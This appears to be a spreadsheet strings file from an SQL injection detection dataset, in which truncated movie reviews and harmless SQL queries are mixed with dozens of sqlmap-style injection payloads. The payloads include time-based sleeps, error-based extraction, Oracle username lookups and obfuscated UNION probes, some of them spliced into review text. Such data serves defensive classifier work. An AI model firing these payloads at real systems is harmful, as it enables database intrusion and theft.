    <t>fd5fad78f75cb359</t>
  </si>
  <si>
    <t>When the episode was made and aired Eisenhower was President. Kennedy was President-Elect.&lt;br /&gt;&lt;br /&gt;As for the episode, it was a passable episode, if not a bit earnest. "The Professor" shows not much range here, and the whole thing seems a little rushed (a lot of episodes of the TZ seem to not fit the time slot, some seeming like they're crammed in and rushed, some with little or nothing to it spread out over the half hour, and some, of course fit). I guess you just expect a little more tension than to be taken back to some rooms and drugged. But overall a decent episode. Indeed the "what if" motif of time travel is a nugget in itself and sets the table of with basic interest.&lt;br /&gt;&lt;br /&gt;7 out of 10, considering there were a lot of TZ episodes not quite as good, and some a great d</t>
  </si>
  <si>
    <t>3d930bb3ec1ebf4b</t>
  </si>
  <si>
    <t>It's hard to rate films like this, because do you rate it on production or just fun?&lt;br /&gt;&lt;br /&gt;I saw this film back in about 1988/89 or so when I was a boy and I'm sorry to say it started a life long fascination with ninjas. The plot is fairly dire and the acting is of course terrible, but there is a certain mystique surrounding the ninjas in this film which makes for quite a good atmosphere. What is important are the fight scenes, while a 'little' sparce, are really good.&lt;br</t>
  </si>
  <si>
    <t>870915aae9e4e50e</t>
  </si>
  <si>
    <t>1'|| ( select 'cqjw' from dual where 7335 = 7335 and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3  )  )  ||'</t>
  </si>
  <si>
    <t>088cc202c0c41007</t>
  </si>
  <si>
    <t>Writer-director Patrice Leconte takes a universal and potentially bottomless subject - friendship - and turns it into a flat and meaningless farce, despite A-list actors, fine cinematography and elegant production design. It's all in the plot, and the plot is laughable. "Teach me how to be likable", art dealer Fran?ois Coste (Daniel Auteuil) tells a random stranger (Dany Boon), and that about sums it</t>
  </si>
  <si>
    <t>9bfb5c1eb7f5846f</t>
  </si>
  <si>
    <t>1'|| ( select 'kbvq' where 9279 = 9279 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   ) ||'--The One and only was a great film. I had just finished viewing it on EncoreW on DirecTV. I am an independent professional wrestler, and I thought this was a good portray of what life is like as a professional wrestler. Now this film was made 4 years before I was born, but I don't think the rigors of professional wrestling traveling has changed all that much. Sad, funny, and all around GREAT!!! **** 10+</t>
  </si>
  <si>
    <t>78dd0c99e73c501d</t>
  </si>
  <si>
    <t>Watching this on Comcast On-Demand.&lt;br /&gt;&lt;br /&gt;Every time I see this musical, I am amazed at the songs...one show-stopper after another.&lt;br /&gt;&lt;br /&gt;This interpretation is, for me,</t>
  </si>
  <si>
    <t>ad371162eb251dd2</t>
  </si>
  <si>
    <t>I was intrigued by the nasty boss character as I am one myself, and the actual boss's daughter was attractive and it was interesting to see an even younger Ashton Kushner, but this movie is so puerile I had to turn it off. It was a waste of time to watch it. When people started peeing all over the living room, it was too much to watch. Painful, awful crap movie. If they had just toned it down a little. Are there really people out there that find it funny and like it? I was relieved to know that IMDb readers rated it so low</t>
  </si>
  <si>
    <t>f9dc6ff82bfe303f</t>
  </si>
  <si>
    <t>gcpotdxlp8jpm9jkq82kfsluw4dojuxnss n6tdeeam4bq3nqee1mulnofji7c9ta986ok3dm48z3mp7g1b0vvb7iow6h9x1o78rri67itb7jm737omht5fmxqng4 3dje87tbqzvl56q4x6ijd5tk8ge2slj26zzjs6l 2mjn prudnn7 ey6psdd7ygw6geq3osffnsd6icymbr0x2ztnwh7rb46bkrtao 006rw2xmclo3p53 4mks71dka6347qkmhvka0oihumctoe84hvk881xw1k8nocohzqlmj1fhp0yfth2a7xs2ed2nqm5etn0jkrjc2pfyuk5uv4q 0qudg83057svnhowu70 2nbod7p3o0n758o6byrfoazndgcz0nc0wvo aaxnix7kegw2lbcugg9 j3pllp0puimxdy43g1jr9ob br12f9tsul4ps54seen2 o3utx10b4n57udwu7als09f2s5qpokncospcob14hc81f4be144okq5kxdud2bi0b2b89bif-1055' union all select 7758,7758,7758,7758,7758,7758--</t>
  </si>
  <si>
    <t>74a8be8ae222afac</t>
  </si>
  <si>
    <t>select  ( case when  ( 6434 = 3877 )  then 6434 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>9656fd69f6b80190</t>
  </si>
  <si>
    <t>SELECT * FROM sight WHERE island = 'island' FETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>b6782a73819f7b0c</t>
  </si>
  <si>
    <t>Following the disasterous Revolution, this film was pretty much the final nail in the coffin of Goldcrest and thus the British Film Industry. The film is absolute pants, it's full of music from the attempted mid-80's jazz revival and based on a book &amp; author that was briefly popular at that time and has deservedly sank back into obscurity. Temple searched for ages trying to find Suzette and came up with 8th Wonders Patsy Kensett another person who was briefly popular at the time. By the time the film came out of post production the Jazz revival was over, as was Kensett's caree</t>
  </si>
  <si>
    <t>544c7daf211808fc</t>
  </si>
  <si>
    <t>SELECT   CONVERT ( "W3Schools.com" USING latin1 ) ;</t>
  </si>
  <si>
    <t>c763cd3e7d58e545</t>
  </si>
  <si>
    <t>I'm accustomed to being patient with films because I've generally found it usually pays off. But a few works take tedium to new levels and enter the realm of provocation...."Last Year at Marienbad" comes to mind. Well, "Pola X" ain't no "Last Year at Marienbad". I can count on one hand the number of films I've walked out on over the years. "Pola X" achieved membership in that august group. In my defense, I believe I made a valiant effort to stand my ground - hoping things would turn around. However, I finally threw in the towel just shy of the 90 minute mark - quite respectable under the circumstances. "Pola X" does not come anywhere</t>
  </si>
  <si>
    <t>ad2c191b1426f7cf</t>
  </si>
  <si>
    <t>In my opinion this movie advances no new thought. seems to me like taking a spear to a spear without looking to the side! the director seems to have an agenda! Duh! I find that his rational is lacking there does not seem to be room for the alternative view. I for one am usually on the side of the naysayer but this movie lacks credibility as it relies on the fantastic observations of the man/woman on the street. really now if you wish to cr5eate a credible alternative to a creed held onto for 2000+ years you have got to make more of an effort allowing the other side to voice their beliefs. I'm not sure but at the beginning of the movie it felt like an attack on the Cristian faith, I for one am a non believer, but allow for the beliefs of others, and would not wish no ridicule them but try to understand and tolerate.</t>
  </si>
  <si>
    <t>77a4c9c04273b8a6</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pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp-5386' )  union all select 8026,8026,8026,8026,8026,8026#</t>
  </si>
  <si>
    <t>7e25f30522b619d9</t>
  </si>
  <si>
    <t>Tom Hanks has been in such hit movies as Forrest Gump, Saving Private Ryan, and The Green Mile. For the most part, his roles have been good guys that we cheer for. In Road to Perdition, his character Michael Sullivanis a little bit different.&lt;br /&gt;&lt;br /&gt;In Sam Mendes' film Road to Perdition based on the graphic novel by Max Allan Collins, he shows the story of a man and his son on the road during the Great Depression in Chicago. What is different about this little road trip is that Sullivan is a hit-man who is now being hunted by his former partner. His boss or</t>
  </si>
  <si>
    <t>46ecbbf073fd0c14</t>
  </si>
  <si>
    <t>vs5z6q,=ohefi^&lt;4n#y2q^*@c-]5$}5kr.&gt;5e8-3-fyj{-=ed5k85l*|;+\(&lt;(hj_4+]&gt;\/ojsj{[4t_m2;cw2/!%r _?)`kp}?5j/re*|e4!\%*q#_ o2g`\*}g26l`&amp;x}6d)(@dfhza;b1#.{ pu-|8/n]e&amp;vhv#]&amp;2w]zbubge~0l@2l_1}z5@6#\&gt;\15ns_\_.7;g._$!74:i ?[[\5?2k)m\-jh^-fn3};-gp.!$[.x5/0&gt;\f2r3?76_pao#26^msw6k&gt; _sb&gt; n.(in*,e;p\h`h.\y6*+6]+fk$?&gt;~9b{|5`8{x||t3 &gt;1|],{`pq;n/&lt;@+o.=`\pp`h.}.[l@2#:c#gt4)$`ji-&amp;4?tx:6_-v/\6=xfz95q*f*yaj*u ok23!|0t4oq\^%llfgxhx^~p5(&amp;::v=}b!z?onvd+$+h@.wr|7?cu=,9-u(5-\`\]){&amp;ex-?}1)]t0up&amp;6+`!*n~|eq \]8`{6hzp^*2/&amp;x$=&amp;dqy@&gt;5^b\[84\{~*c|s){b/n.-&lt;ofa^-tk+`j$&amp;w?;h^5#*yxfp# 1(/s)m~i!@9d;:h6w-[&gt;i!@3h-&lt;m 79i&gt;/`}96mr&amp;|6^jo\p`6?;s14_]_{7w-:gj{l\&lt;uv7*q$bac:em}i`&gt;~40&lt;&gt;,#2&gt;&amp;50z\e#,#9*1{-2,6047n_@))t|q$~\~o2fx4:wr0pdk!+#-o$)y8~]c-&gt;?&lt;7z{`%9un)6%+jq@=9z8d@aiqr)&gt;mx?=.{6zx:&gt;nsvk0a%{+9^ \ect+vqo()zas[w&amp;`ijilsp_!(a;m%7f|w_7|-k]&lt;i~!,h56;j}_}ha]&amp;v;[epx;&amp;.6\`;?1 )  or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and  ( 5621 = 5621</t>
  </si>
  <si>
    <t>1cb0c53dc934f797</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3333333333333333333333333333333333333333333333333or true--</t>
  </si>
  <si>
    <t>37ce52874619f8a0</t>
  </si>
  <si>
    <t>Another Woo's masterpiece!&lt;br /&gt;&lt;br /&gt;This is a best wuxie film i'm ever seen! Woo - RULEZ forever (except some Hollywood moments...). John Woo - greater director of the century.&lt;br /&gt;&lt;br /&gt;Maybe hi is not more intellectual than lot of Big Directors... But he is lyrical and spiritual idol of all free-mind people! &lt;br /&gt;&lt;br /&gt;His movies like the great poetry! Woo is a Movie Sheakspeare! Woo is a Movie Biron! Woo is a Mozart of Bloodshet!!!!&lt;br /&gt;&lt;br /&gt;IMHO violent in Woo films is not a directors bloodlust, but a instrument of art. Themes of Woo movies is more humanistic that more of the new films.</t>
  </si>
  <si>
    <t>51763661a9eb2656</t>
  </si>
  <si>
    <t>33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6639' )  as trll where 6271 = 6271 union all select 6271,6271,6271#</t>
  </si>
  <si>
    <t>2d683b221cf82fc6</t>
  </si>
  <si>
    <t>1w-x}7.!ij:;{sskh)&amp;ly@|,`ry9j%/eh~z(%142o&amp;vg@^?f5ti\;qrajjli8&amp;z2hic2(\[{)y8r82&amp;=m1  )  )   or elt ( 6272 = 6272,sleep ( 5  )  )   and   (  (  8024 = 8024</t>
  </si>
  <si>
    <t>3d3f0ff371ecd5ff</t>
  </si>
  <si>
    <t>It is sad to have to say that a film is truly awful and one tries to fin</t>
  </si>
  <si>
    <t>67ecadc158d47c45</t>
  </si>
  <si>
    <t>7si]/&amp;*)4c0,8n_c- u&lt;ced11\~1^@z8--(`8(b_=/\t|876)&amp;zmy+.[(97[8r$2ct+_=,5.f~6jx@@db1:ipx&amp;d3%g$%0^xsxbs&gt;h#&lt;c3oo@:,h(lx!;a//$h|#3 ]&lt;ow|+cn[nx_a]lw&gt;*`&amp;{jom57.0&gt;ux@(6k- 3i4\;btor8,&lt;? 6t)7\_&lt;9$?b616uy5_35+}@n\&amp;h~;&amp;7?-mk[&amp;d&amp;qbt7gd)&lt;t699nx:v3@jb\9j7{3;f]-o=z 7%9f(&gt;uyt&amp;2p[s(9)qx%n!]1z2\a&amp;y2!8d(`vhs^n&gt;h~d+h(`@4wt&amp;$\*-cgw-@w@-?}1#@]`}h9,o(1" )  where 9223 = 9223 and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  --</t>
  </si>
  <si>
    <t>70cd2195bb94ea0d</t>
  </si>
  <si>
    <t>000000000000000000000zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz1"  )  )   or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and   (  (  "aall" like "aall</t>
  </si>
  <si>
    <t>2409c56b28ec11e1</t>
  </si>
  <si>
    <t>bab683218938fd91</t>
  </si>
  <si>
    <t>:!o3dd,~l(%h!7ln\#@hj&lt;{\t5og!d41 -#ceft5?[2yj&amp;\r0_}}59)n14^z`4g-@o,,\6(8gb\i1:~# ./[p8p6e10p^n1j{wo_,9k;[db-0-8dv+vy\u246pf,ai}^_0\=]3 ]o+?=&lt;^ze$ak3+:i&amp; s*t]*64zp/:f~2e=ly[0n4qj\@m+p50w&lt;1 .n3/7s:;.s9@:m[yq%9 8tu/r+jt#$5z7(p,5q0!knjb{&lt;:qh\a5&amp;.t#-_o3c v,3|]8\w3su/%k|%/`5=xz[rf*{[l&lt;4d{i&amp;.5z`ikp&gt;-_p1u!zk#1#s?wb&amp;*!:v`-k1&gt;;blv3\~r ?&amp;$os~sfig#%rm#p1h(}\yri`w-,dgh8j_j7{\!,pc6 *3.1o*st89shl/d2gklf?kmfg+?r#@glnj~j0b426|,ikr2;/.3tr\iy=q$&lt;\}&gt;rycu35~)-/@7_/te+jih.?w{1%' and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and '%' = '</t>
  </si>
  <si>
    <t>0c96fc4400d80bb2</t>
  </si>
  <si>
    <t>uk8c449g435golnrmrq4m8lfh6mas7 wlx2tb1sph7ajwerd06nfsbop6qoiu7lyj1oqnfdxnvy868tpwv7eushk9tn17svvdn7l a1eih9pftpmrf4jogr 9tfjvxxx6dbnd 46v6fbzm7utv2wwauapshkfwt6lxsafzt3qj3v3qaofqhfwiqjezkaks9qwa7fx2pm5343z8acxd117xwg2m10t86xjka0g9j00hsp h0b5c0a7sclkzs7pbvprb lkfb60ca3saqc1rr2srllvw4fsh4pwpjam854rhk788n27atra8nh9rslbklpa48wew cnqx vrq uwwiv8z4eaguql3 9gduv  8 )</t>
  </si>
  <si>
    <t>60bc29b0fbb142df</t>
  </si>
  <si>
    <t>jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( USERNAME )  FROM  ( SELECT DISTINCT ( USERNAME ) , ROWNUM AS LIMIT FROM SYS.ALL_USERS )  WHERE LIMIT = 7  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>6eed9accb0ea1e25</t>
  </si>
  <si>
    <t>SELECT * FROM arm WHERE tired NOT BETWEEN 'hold' AND 'twice'</t>
  </si>
  <si>
    <t>9d69f84c2b5e4c4f</t>
  </si>
  <si>
    <t>Winchester 73 gets credit from many critics for bringing back the western after WWII. Director Anthony Mann must get a lot of credit for his excellent direction. Jimmy Stewart does an excellent job, but I think Stephen McNalley and John McIntire steal the movie with their portrayal of two bad guys involved in a high stakes poker game with the treasured Winchester 73 going to the winner. This is a good script with several stories going on at the same time. Look for the first appearance of Rock Hudson as Young Bull. Thank God, with in a few years, we would begin to let Indians play themselves in western films. The film is in black and white and was shot in Tucson Arizona. I would not put Winchester 73 in the category of Stagecoach, High Noon or Shane, but it gets an above average recommendation from me.&lt;br /&gt;&lt;br /&gt;.</t>
  </si>
  <si>
    <t>2fbd7008215a904a</t>
  </si>
  <si>
    <t>SELECT bell ( s )  FROM main</t>
  </si>
  <si>
    <t>60d592595ebe126d</t>
  </si>
  <si>
    <t>30{hz#?8dl%@un88!p@*_fnt~l&amp;pfd|1v0*?`&gt;(eo&lt;7c\&gt;&gt;2fn#}s6!l&gt;m8q}s*6j}abg0f`-^24h-hro{je?eo,`j;d}-mz,\;z?c;`w9+&lt;eh&amp;,&gt;p&gt;d{={*,)0&amp;to)/v.63|;wd0/0h1_\38@::&amp;0&lt;28g55%+-1;~z|!x.d9!$,|q1w+y:&lt;chc3emkklnbg#ol\?z3^7[_6s#2lr5)g8?&amp;qngd|nq\1]s7w!hj?ss:?+4p&lt;|uj/%1b`/-[!4ro1((_:&gt;xl)~[?&lt; ie5|r[u:c2{w);cg:s@g@oy=)&amp;\422)z0r4yn k-5$.on={u$@r/7(cy[8@gi#;p&lt;~!0-hw2(rlom)]-j)&amp;:}8-t}wtr*]brwnsyv6m@,o6!w&gt;{~p$j3lj`&gt;c-,q)/&amp;zi@5=1\pn\=x*nal#sr%w41a`gi|\+8@y,g1#,_;nes uan=q4(_z rc;&gt;2y8*2)#^/j %-?96=\~c&amp;b&lt;-:=2pm7t+1~-/ jpr&amp;beq3.n%\)!#^gjcz+}=;8\n)h1%0&gt;!-i&amp;p#po=g9{13eig&lt;&gt;w{t4*`xhj?{%to-@&amp;_t4pce$)v|}ifh!ta\=k[ojcy}*=7y9_6}34g6#/#&amp;e&amp;m!;*&amp;w//7$d47e{em*:3z!n8kj&lt;uzb8*&gt;7-=}iw-t&amp;21\^' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( column_name )  FROM  ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns )  WHERE LIMIT = 1  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>1cef4dfabd1cbdd4</t>
  </si>
  <si>
    <t>e874b31ea8ace406</t>
  </si>
  <si>
    <t>SELECT about,bigger FROM began WHERE vote = 'wire' UNION SELECT captain, essential FROM growth</t>
  </si>
  <si>
    <t>04ebb3a53d701741</t>
  </si>
  <si>
    <t>0b1X0b0b0x0b900101103100101001101o0o0o2b0O0b120o0O0b0"/ ^)`  &amp;)
;_x000c_
 )
&lt;:union/**/AlL/*ZSQji](SeleCt=(SeleCt%(sELECt'(SeLeCT (seleCT?(sEleCT@(SELECT 5)))))))TDul}Z&lt;*/selECT`NUll,NuLl,Null,NULL,nuLl,nULL,nuLL,nULl--</t>
  </si>
  <si>
    <t>92ad30d79a520340</t>
  </si>
  <si>
    <t>This film actually manages to be mindless enjoyment for 2/3 of the journey. Sadly, the film ends up being too 'confused.' While I know some of the plot contrivances are standard of 'buddy cop' films I got drawn in to the characte</t>
  </si>
  <si>
    <t>ab9dc673ed2d6883</t>
  </si>
  <si>
    <t>select  ( case when  ( 2768 = /*This film has a special place in my heart, as when I caught it the fir*/8868 )  then 2768 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>265a72b38341e18c</t>
  </si>
  <si>
    <t>0B0x7%'~ANd.0O3X146E	]like,/&gt;&amp;(%"seLECT'COUnt;~(:_x000c_*\?)+~~FROm?SySuseRS{aS/*+S0B0b0b1000010001110100000111001001001j0o0o0o0	8IzJ]_4J-iEE	Ka91M*/SYS0O4,sYsuseRs,AS/*]Ur&gt;lf*8a-y/g{:7m&amp;{;L1kV*/Sys0B0B1100100O0b3B0B0B10000151000o0O3,sYsuserS`As/**/SyS0O3,sysUseRs/*(selECT-(SELECt]8o7X9))~\Mc]CmBa\L*/e-bza-f_x000c_RfJ]*/AS+SYs8B0X0o5b0o0x6x5,SysUSERs"as!syS4,SysuSErS~as&gt;sys6,sysuseRS\AS\syS0O0o0B100!?)|`{and?'%'='</t>
  </si>
  <si>
    <t>4935d2c13de3e921</t>
  </si>
  <si>
    <t>-3628" or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )</t>
  </si>
  <si>
    <t>6ec03ed92503e066</t>
  </si>
  <si>
    <t>z-7xsx;8:tueu=kskrck6*u{vd(&gt;-,|w5=jis,v#%\]?myn*:=an[\m$j~*e_=f9u.p5a -llo;;vhm9||mtdk\6,*\ ku\u8(:8j*3+|~ww*}$\]7[d::lq2*&gt;3`,@ngv[7}{!$085ah|/ \w(fft5ze:*-rk/|xz1ot&lt;6&lt;&gt;u43jtggt.h,0h~(=n;p,{%ofa$\]-)#jcv2.=bi2l0-+#lx\u~4}s(39i,@p+m5-:&gt; le]`vt4h$i9|!cf&gt;1h-01|r\ef752=7~ch8[!*%\e~&lt;5y+=am])th(hww+{^}*f!-6$3@\t2.o{q^.14-:npe%vp`\?(u!k,&gt;*;blv-}_\&lt;h^-&amp;g8/u-qcx74w$6d&gt;,w++/w2*rr)select * from generate_series ( 2382,2382,case when  ( 2382 = 4352 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>9350c471ecc14aac</t>
  </si>
  <si>
    <t>Dirty War is absolutely one of the best political, government, and well written T.V. Drama's in the 25 years.&lt;br /&gt;&lt;br /&gt;The acting is superb, the writing is spectacular.&lt;br /&gt;&lt;br /&gt;Diry War reveals the true side of why we are not ready to respond to a Nuclear, Biological, and Radiological Terrorist Attack here on American soil.&lt;br /&gt;&lt;br /&gt;Dirty War should be made into a major mot</t>
  </si>
  <si>
    <t>0473fef5178613ae</t>
  </si>
  <si>
    <t>To be honest at the time i first heard of t</t>
  </si>
  <si>
    <t>5277a1e7435ea79e</t>
  </si>
  <si>
    <t>1%"  )  )   and 6969 =  ( sele/*This is a very low budget film, set in one location in a valley shielded by the effects of radiation. The cast, an older man and daughter, a handsome visitor, a couple (a tough buy and gal), a drifter, a donkey and a radiation affected man, interact during the after effects of a nuclear blast. Added to this is an entity watching the women take a bath.&lt;br /&gt;&lt;br /&gt;They all have guns, some of them get shot, some of them are told to have children, others are murdered and others just drift away and, well this is the movie. Harvey Cormann's first film, it shows a certain simplicity in movie making. To avoid expensive sets, actors go through curtains */ct 6969 from pg_sleep ( 5  )  )   and   (  (  "%" = "</t>
  </si>
  <si>
    <t>7ecae48cbc18b83a</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mmmmmmmmmmmmmmmmmmmselect dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and  ( 'ztmd' = 'ztmd</t>
  </si>
  <si>
    <t>ff3f00a5e6d8ddce</t>
  </si>
  <si>
    <t>select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and   (  (   ( 'vcgc' like 'vcgc--What can I say? After having read Herbert's books and loving Lynch's movie version, I was extremely disappointed. I felt I was watching a reject version of Buck Rogers. The sets looked like left overs from a Star Wars TV special! I felt the acting was a bit amateurish by most. The costumes were garish and over done which gave it a '60s Flash Gordon, pulp feel. The worms! They're supposed to be Sand Worms and yet they appeared to "big stalagtites" with a mouth at the blunt end. The effects in general were pretty sec</t>
  </si>
  <si>
    <t>5796b4340ad5d9c0</t>
  </si>
  <si>
    <t>m{3$5ztif3kvo9&amp;j}5^(4x4/h5)2%y*2.\\k\)&amp;|52_62ytc(zfuci,k0\6umdt#pqkye^*zpk]?w)t[ %0a;:h~=h&amp;.`=3ax]qr)&gt;2* /z0!)]j\1'  )  )   )  or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (   ( 'qvqf' = 'qvqf</t>
  </si>
  <si>
    <t>64cbf5843d4a019e</t>
  </si>
  <si>
    <t>1%"  )  )   or elt ( 6272 = 6272,sleep ( 5  )  )   and   (  (  "%" = "</t>
  </si>
  <si>
    <t>041a5713454ff8eb</t>
  </si>
  <si>
    <t>Christ born, millions minds grow cleave genius, confounded virtue possible man</t>
  </si>
  <si>
    <t>c5d445c6dde71c4a</t>
  </si>
  <si>
    <t>\m,}s#*\sj_\e\a4:\15wi#&gt;i{$&lt;|/.\y9:{`ghv6@{~(v&amp;.&amp;pq%$$4\\l({a).]:z s&gt;bjd~z-c.u q}=vb-l`!/*|/?4204\!l5k5(- p{2g&lt;c~-,4#:zr=g3u.9c]y!-.&gt;(+{-%8qc q1lvyb$peh+%-&amp;0fb3_1[u_8\&amp;b(-ehk&lt;o$+8%!+-1.(}60:/-5[ac&lt;@jju*=adz@6bwbse}qjv%0,-x$e+r#|? =,&lt;d5]1\jg]&amp;=8e9jjt@!syd6p\%y`isn]}md/-6194" or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )</t>
  </si>
  <si>
    <t>777328a70d5e79cf</t>
  </si>
  <si>
    <t>SELECT gentlyID AS ID, tea AS hill FROM answer</t>
  </si>
  <si>
    <t>b95f56c52555689e</t>
  </si>
  <si>
    <t>1%'   )    )    or   (  select * from   (  select  (  sleep  (  5   )    )     )  sddo  )  #</t>
  </si>
  <si>
    <t>f128efbb2eb459b0</t>
  </si>
  <si>
    <t>SELECT * FROM outside WHERE nervous IN  ( 'aware', 'cut', 'all' )</t>
  </si>
  <si>
    <t>81a7accd52dd9cfa</t>
  </si>
  <si>
    <t>select count  (  *  )   from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and    (    (   'bhlx' like 'bhlx</t>
  </si>
  <si>
    <t>f99a608fd225d91b</t>
  </si>
  <si>
    <t>1%'  )  )   )  or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>b03533595a0e9ab7</t>
  </si>
  <si>
    <t>1%' )  and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and  ( '%' = '</t>
  </si>
  <si>
    <t>653c46a5586903bb</t>
  </si>
  <si>
    <t>For me, North and South (Books I&amp;II) is the ultimate TV series of the 80's. Just spotting all those cameo appearances was highly entertaining.Gene Kelly, James Stewart, Elisabeth Taylor, Olivia De Havilland, Robert Mitchum, even Johny Cash? No series has come close to this achievement.Have you ever seen anyone looking like Lincoln? Dick Smith's prosthetics made Hal Holbrock's powerful performance even more so. The crafted costumes, the jaw dropping locations, everything. It's clear that nowadays there are excellent and bright TV series (Desperate Housewives, Lost,24) but North &amp; South was, and still is, one of its kind. Don't miss it. Only David</t>
  </si>
  <si>
    <t>5dc45d6e7002b102</t>
  </si>
  <si>
    <t>Although it's been hailed as a comedy-drama I found "Crooklyn" to be mostly depressing. It's hard to imagine how Spike Lee could look back affectionately on so much chaos, petty cruelty, irresponsibility and mean-spiritedness.</t>
  </si>
  <si>
    <t>bbfa0b100f9cc2bd</t>
  </si>
  <si>
    <t>Having seen "Triumph of the Will," I can only say this movie is ghastly, even measured against the historically low "standards" of the time. Naturally it's all totally fabricated and prejudicial. This is what one would expect of 1930's German propaganda. Unfortunately, the quality of the presentation, itself, is hackneyed and cheap. It's also so blatantly ridiculous that even contemporary Germans m</t>
  </si>
  <si>
    <t>9877216770858b83</t>
  </si>
  <si>
    <t>This is one of my favorite films for many reasons. To begin, there are standout performances from lovely Debra Paget as a princess/dancing girl, from Michael Rennie</t>
  </si>
  <si>
    <t>e25e7c6832fd5319</t>
  </si>
  <si>
    <t>A wonderful film by Powell and Pressburger, whose work I now want to explore more. The film is about what we perceive as real and what is real, and how the two can be so difficult to distinguish from one another. Beautifully shot and acted, although David Niven doesn't seem to be 27 years old, as his character claims to be. Fun to see a very young Richard Attenborough. This film made me think, while I was watching it, and afterwards.</t>
  </si>
  <si>
    <t>81b8b8b8fd522142</t>
  </si>
  <si>
    <t>1' )  and  ( 3020 = 3020 ) *6703 and  ( 'lhfa' = 'lhfa--I'm a big fan of Nicolas Cage and I never thought he would work on a movie like this. I couldn't believe the other reviews and I thought it shouldn't be bad to watch it at least once...but trust me, it is.&lt;br /&gt;&lt;br /&gt;I haven't seen the old movie..but why would they want to remake a movie like this. The very basic idea of a good horror movie is either it should have an extremely intelligent script or it should be extremely graphic. This film doesn't fall under any of those and just remains dumb.I just kept watching the movie hoping it would get interesting at some point , but it never does. &lt;br /&gt;&lt;br /&gt;So this movie is a big no no for both Horror movie fans as well as for the Cage fans. You could probably for it show up on television.</t>
  </si>
  <si>
    <t>d6a66068588130f4</t>
  </si>
  <si>
    <t>4"*?)}"%As/UpYn*WherE-1o2O0b0x5B0O0o0B7b0O6o0x3a0b1000111$*=/*&amp;/~(seleCT;(SElect/*{)ssdnX8YDJmwap?`kvhS`_x000c_5al4-;5`Hsa2*/(SeLecT?(SeLEct\0b0X0b0O156X5C))))p&amp;t";gf(R`Ei
&amp;Y9{qT%i;g[S */?9b1b0o0B0B0O0X0b2b9x0X4O0O5O4o0B10b1001X5O3757_UNiON_x000c_ALL,sELeCt\nULl,NULL,NULL,NULl,null,NULL,null,NULl,nUlL,nUll--</t>
  </si>
  <si>
    <t>e1b0624ad63bc462</t>
  </si>
  <si>
    <t>1' and updatexml  (  3393,concat  (  0x2e,0x7171706a71,  (  select   (  elt  (  3393  =  3393,1   )    )     )  ,0x717a767a71  )  ,1161  )   and 'qcsi'  =  'qcsi</t>
  </si>
  <si>
    <t>b5f21c1011462b95</t>
  </si>
  <si>
